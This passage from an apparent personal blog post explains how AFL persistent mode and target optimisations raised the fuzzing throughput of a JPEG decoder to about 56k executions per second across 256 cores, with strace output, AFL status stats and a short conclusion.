You can see we introduced __AFL_LOOP here. This only has special meaning when running under afl-fuzz; when running there, it uses signals to notify afl-fuzz that it is done with a fuzz case and needs a new one. We set this loop to a limit of 100,000 iterations before tearing down the child and restarting. It’s pretty simple and pretty clean. So now hopefully our syscall usage is down. Let’s check that first.

We’re going to run this new single threaded and verify it’s running as persistent:

pleb@debphi:~/blogging/jpeg_fuzz$ afl-fuzz -i /mnt/ram/jpegs/ -o /mnt/ram/outputs/ -- ./a.out @@
...
[+] Persistent mode binary detected. <<< WOO!

Yay

Woo, it’s just a little under 2x faster than the initial single-threaded djpeg (we’re running this one on a ramdisk, but I verified that was not relevant here). It’s running faster simply because we’re doing fewer miscellaneous things in the kernel and in the code itself.

So AFL tells us that it is persistent, but let’s triple check by running strace on the fuzz process:

ps aux | grep "R.*a.out" | grep -v grep | awk '{print "-p " $2}' | xargs strace

It’s a bit ugly, but it straces any actively running a.out task. Since it’s crude it might take a few tries to get attached to the right one, but I’m no bash pro.
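If the one-liner is being uncooperative, here’s an equivalent little sketch (again just illustrative, assuming Linux and Python 3, with a made-up helper name) that finds a.out tasks currently in the running state so you can pick one and attach strace -p to it:

import os

def running_aout_pids():
    pids = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/comm" % pid) as f:
                comm = f.read().strip()
            with open("/proc/%s/stat" % pid) as f:
                state = f.read().rsplit(")", 1)[1].split()[0]
        except OSError:
            continue
        if comm == "a.out" and state == "R":
            pids.append(int(pid))
    return pids

print(running_aout_pids())  # pick one of these and run: strace -p <pid>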

We can see we get a repeating pattern:

openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---
openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---

We can see the openat to open the file, the read to read it, and the close when it’s done parsing. So what is the rt_sigprocmask() and beyond? Well, in persistent mode AFL uses this to communicate when fuzz cases are done. You can actually find this code in afl-2.52b/llvm_mode/afl-llvm-rt.o.c. There’s a descriptive comment:

    /* In persistent mode, the child stops itself with SIGSTOP to indicate
       a successful run. In this case, we want to wake it up without forking
       again. */

This means that the rt_sigprocmask() and everything beyond it is out of our control. But other than that we’re doing the bare minimum to read a file: open, read, and close. Nothing else. We’re running tens of thousands of fuzz cases in a single instance of this program without having to exit() and fork()!

Alright! Let’s put it all together and fuzz with this new binary on all cores!

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 1 hours
         Total execs : 20 million
    Cumulative speed : 56003 execs/sec
       Pending paths : 1 faves, 122669 total
  Pending per fuzzer : 0 faves, 479 total (on average)
       Crashes found : 0 locally unique

Woo, 56k per second! More than the 2x we were expecting from the custom-written target. I’ll save you another htop image and just tell you that now only about 8% of CPU time is spent in the kernel. Given we’re doing 7 syscalls per fuzz case, that means we’re doing about 400k syscalls per second, which is still fairly high, but most of the syscalls are due to AFL and not us, so they’re out of our control.

Conclusion

It’s pretty easy to get stuck thinking tools work out of the box. People usually worry about scaling at the level of “is it possible” rather than “is it actually doing more work”. It’s very easy to run 64 instances of a tool and end up getting very little performance gain. In the world of fuzzing you usually should be able to scale roughly linearly with cores, so if you’re only getting half that efficiency it’s probably time to settle in and figure out whether it’s in your control or not.

We were able to go from naive single-core AFL usage at 214 execs/sec, to “just run 256 AFLs” at 4k/sec, to some affinity and target optimizations that got us to 56k/sec, all within a few hours of work. It’d be a shame if we had just taken the 4k/sec and run with it, as we would be wasting almost all of our CPU.

Extra

This is my first blog, so please let me know anything you want more or less of. Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Shoutouts

Shoutouts to @ScottyBauer1 and @marcograss on Twitter for giving me AFL tips and tricks for getting these numbers up.
